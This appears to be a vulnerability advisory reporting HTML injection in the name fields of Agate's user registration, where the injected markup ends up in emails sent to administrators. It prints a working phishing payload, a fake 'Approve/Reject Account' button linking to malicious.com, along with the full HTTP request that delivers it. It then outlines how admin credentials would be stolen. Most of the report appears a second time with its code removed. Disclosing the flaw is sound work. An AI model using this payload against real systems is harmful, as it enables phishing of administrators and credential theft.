Summary
When registering for an Agate account, arbitrary HTML code can be injected into a user's first and last name. This HTML is then rendered in the email sent to administrative users. The Agate service account sends this email and appears trustworthy, making this a significant risk for phishing attacks.
Details
HTML injection involves an attacker's ability to insert unauthorized HTML tags into a webpage. This happens when an application fails to sanitize user-supplied data properly. By injecting their own HTML code, attackers can manipulate the content and structure of the page, potentially leading to deceptive displays or phishing attempts. This attack is typically used in conjunction with some form of social engineering, as the attack exploits a code-based vulnerability and a user's trust.
PoC
As an unauthenticated user.
A request to create a new user is made. HTML is injected into the last name parameter, which aims to mimic the appearance of an email that an admin would receive from this endpoint.
HTML:
<p style="margin: auto;text-align: center;"> <!-- Agate link --> <a href="https://malicious.com" target="_blank" style="color:#1f2d3d;font-weight:bold;background-color:#ffc107;padding:10px 20px;border-radius:15px;text-decoration:none;display: inline-block;margin-bottom: 0;font-weight: normal;text-align: center;vertical-align: middle;-ms-touch-action: manipulation;touch-action: manipulation;cursor: pointer;white-space: nowrap;padding: 10px 15px;border-radius: 10px;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;"> Approve/Reject Account </a> </p> </div> </div> <p style="display: block;margin: 5px 0 10px;font-size:14px;line-height:2;color:#aaa;"> This is a generated email. Please do not reply. </p> </div> </div><br><br><br><br><br><br><br><br><br><br><br><br>
Request:
POST /ws/users/_join HTTP/2
Host: <redacted>
Cookie: NG_TRANSLATE_LANG_KEY=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <redacted>
Content-Type: application/x-www-form-urlencoded
Content-Length: 3923
Origin: <redacted>
Dnt: 1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
[email protected]&firstname=<redacted> requested an account and is awaiting approval&lastname=<p style="margin: auto;text-align: center;"> <!-- Agate link --> <a href="https://malicious.com" target="_blank" style="color:#1f2d3d;font-weight:bold;background-color:#ffc107;padding:10px 20px;border-radius:15px;text-decoration:none;display: inline-block;margin-bottom: 0;font-weight: normal;text-align: center;vertical-align: middle;-ms-touch-action: manipulation;touch-action: manipulation;cursor: pointer;white-space: nowrap;padding: 10px 15px;border-radius: 10px;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;"> Approve/Reject Account </a> </p> </div> </div> <p style="display: block;margin: 5px 0 10px;font-size:14px;line-height:2;color:#aaa;"> This is a generated email. Please do not reply. </p> </div> </div><br><br><br><br><br><br><br><br><br><br><br><br>&locale=en&g-recaptcha-response=03AFcWeA6oN-J63nnCc2O5neOhf6AtRJGx810XdLqsOo_-xzfxXdHn6zH0y8Y_oCvJDXRHRLYlBXCg45BDQDIDsJbC3D-FBX06i0-jGybLrFejrK24Y8VXxCD7hHFIxSoC4C5TlsRK3czKbaBl6d-wtOi9HsPRGUIQi0oDDoGz0c4MZiU-4z1SYxbfcB4K8__46A5etRcFpa5MEJ_o-6Eh4TBSnqyGY7NaKSEfgUWjukOEzCFRmi87-aWq_uV-XmigEMLXLaTTvKdjj0vWrQSAxCdf6apZ26WHuzpy04INbrOltpQcCVXWsJ38eV7FCHq1oLhs0oJoXZNAcj-zsbqidhrmFYrmwGq6NNcYRG-3FmBVWDg5dEhrGLi2UGeyHc43MPdmZbCYAl9_92sV8wAD5JZNxRBBxeIZOSsgrQh2SktUWcUNNg0kSn8TH9n2UkYsnETo_LGV87vXiNu2Frtk7Xltfmp6hw5VcKlmRWM75UePHlsxhwU4EfASRpspAc8Jz4c7w9rJfTlv_xc-URsI2G0K31_NzZe_NHdbSsd2pxrkgkf0KCmg8dje1MB6dcmGj-P2VdU5-zguiBnJdVR0OZcKb6-OmOz7SEdX2d6wXUZxUc5LXd1EprlU-mhx2PGXnGnHXRu9_14oVD5cviPgeePiY56zjmjiySZXENQ1SxfOKi-XdJWZ_qa1prPzFBwDkaBalZKdoPXOlt0NupO1vlTldmn6Jiw-g6VHi5nDHUv0Ww6gvU32Ey1lv0Zry7zok0fY8bKNh-t3i_NW8f4tnDpVorpOjeUdqodLa9xicL7wim7ncMOGeCWVFmEp7qqKCRcg9qw5QfwoDcl3fRme4G69FFSAgxxSQPVGbM4I_krQKjdqZsWsM-4fuP3JMJs6zOsLJJ8PUC5P2df6tnGetVFzWFAe-59qRPuo8S71Dq3jgcETliqEy_SISGu2w851pWSKKEuKuyMnjceTDbdZjPODmowvSRQsfXa-gleQvZukNDmIgcuwzEVj33NdlwbtevQYUNq8peVzLI5acv-nQlYGM0ftMCp3gOBMyogyxuOLAjM-Ip0QTiVLA2YOAc7A8W78VHGbZPhI87SXGzE1UhxeGMgAmyhweMb8yrxzVeGT4d0EnepQ1kKx0P9hiJvsw0GLbePjhVPpvtN6AoJ__tjzld6Q-PwKA6HhkPZKQhkDe04L1m5QYcuDLkdjGwZB1hWZFyWy9xPbDXFiocGWWVjFrSVvJV4xvfUK49wbceutG29NR2AjsY0S4oL5dhwjXu_7VRXO3AXyntF75-LCfEl6CRMBIGCGp1qLreQH6yAJxQxQ-SucU3W1NMUxW-RpxN1zqfnhe7gmiHnwh8wsi0tuird1tboWce4f7qqNU1Z9g-Sn3rwQbMOBqbYBBeBydJgu-OmqguH63YMFSBf15WvHNql-f32HsKkedlK2n-jh2dup4aiW75tJIBunFjeaC7vM33JUGkd6AW9xoGTDP2m6FlW6EeHn3hp53LCN4ux90w3JBB2q7zeJ6Ow1chYbFlTDJdWcWZbTeSa1HWy_5alVeTABuny1f8oQ6-loRETYHpxg7DBVk9lycGT3LaYj1fW5QZsprNN1ixhqQ4yaGkBW1OHW3DnbUlCPjhiv9sF4Fdp2qeYRl2i9MuHN8czyR9P2HG8i2Zg_tH-phbuwnfDcXEbwnfN_P-sCn9_oq-U8WUdAPwiLmY2eOtFIwPhsmtUwn_SqsF_BDTORiCCD-x5y4UQT6-92wNxyvarAzLv729OppXA712BeWEBUZxxgh_cRwoGDrMe2YO0xPu-ymakn22FsVXn1t2rOtE0me51wygHAFsS86k7EIFplEbSYOTCXCq3ETxvry7XsF0E4NmIXvfdRzBKKY71Ss0XSkO2_roALbh9xRsmTpgmtIzraNbKvb25kpNsfOselWX0ftrS5x7orvfaPAvUJLxz1h4DRFPyx8wJCfHCE5o-D3D3twydSqGly8zHKY4_QTW5DaVhgcbYuyahyUtI4CF8spsaAocMSI8DWY5tCPu3LkAr8TVbUvR9sfioTnYD71OeNlH2EwZDvrSPW7T7ubMuUi1T8Is__n6lNfwo_njPg4jHB0YwawvKn-5kubpXNAMXVuehii7WmSwyie-o0i4bSiaMFWuEqXpWYcsZDHdw6pZsNqiUusFMvWIGsEdGJBV_vXdjtx987cGDhisQtSZIpvbjxkog7GlaOclVUoFKGAEwBCL1EdVG20QqavvgbsZsY86scrk3cWmPBTjgjb6AcZuxcKAmz3NaSrT1gPtH1Y8LgGJdVDl5C29UIOZIXLvCHHvBKcU7CRg-AIg
Response:
HTTP/2 201 Created
Server: nginx/1.27.2
Date: Wed, 27 Nov 2024 13:41:08 GMT
Content-Length: 0
Vary: Accept-Encoding
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'
Location: <redacted>
Set-Cookie: agatesid=;Version=1;Comment="Agate session deleted";Path=/;Max-Age=0;Secure;HttpOnly
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
As a result, the Agate administrator will receive the following email from the Agate service email account. Note that the first displayed button is the malicious button, which will send the victim to the malicious website. The second button is the legitimate button. With more effort, this PoC can be made more convincing, potentially hiding the legitimate button altogether.
Received email:
Impact
A potential attack scenario might look like this:
- The attacker registers a new account using a malicious first and last name containing the injected HTML content. The content mimics the appearance of an account approval email sent to admins.
- The Agate administrator receives the email and clicks the link, indistinguishable from the regular approval email.
- The malicious URl directs the admin to a webpage which mimics the appearance of the Agate login page and steals the administrator's credentials.
Therefore, administrative users are impacted, as they can be targeted by unauthenticated users.
Parnuski Reporter
Summary
When registering for an Agate account, arbitrary HTML code can be injected into a user's first and last name. This HTML is then rendered in the email sent to administrative users. The Agate service account sends this email and appears trustworthy, making this a significant risk for phishing attacks.
Details
HTML injection involves an attacker's ability to insert unauthorized HTML tags into a webpage. This happens when an application fails to sanitize user-supplied data properly. By injecting their own HTML code, attackers can manipulate the content and structure of the page, potentially leading to deceptive displays or phishing attempts. This attack is typically used in conjunction with some form of social engineering, as the attack exploits a code-based vulnerability and a user's trust.
PoC
As an unauthenticated user.
A request to create a new user is made. HTML is injected into the last name parameter, which aims to mimic the appearance of an email that an admin would receive from this endpoint.
HTML:
Request:
Response:
As a result, the Agate administrator will receive the following email from the Agate service email account. Note that the first displayed button is the malicious button, which will send the victim to the malicious website. The second button is the legitimate button. With more effort, this PoC can be made more convincing, potentially hiding the legitimate button altogether.
Received email:
Impact
A potential attack scenario might look like this:
Therefore, administrative users are impacted, as they can be targeted by unauthenticated users.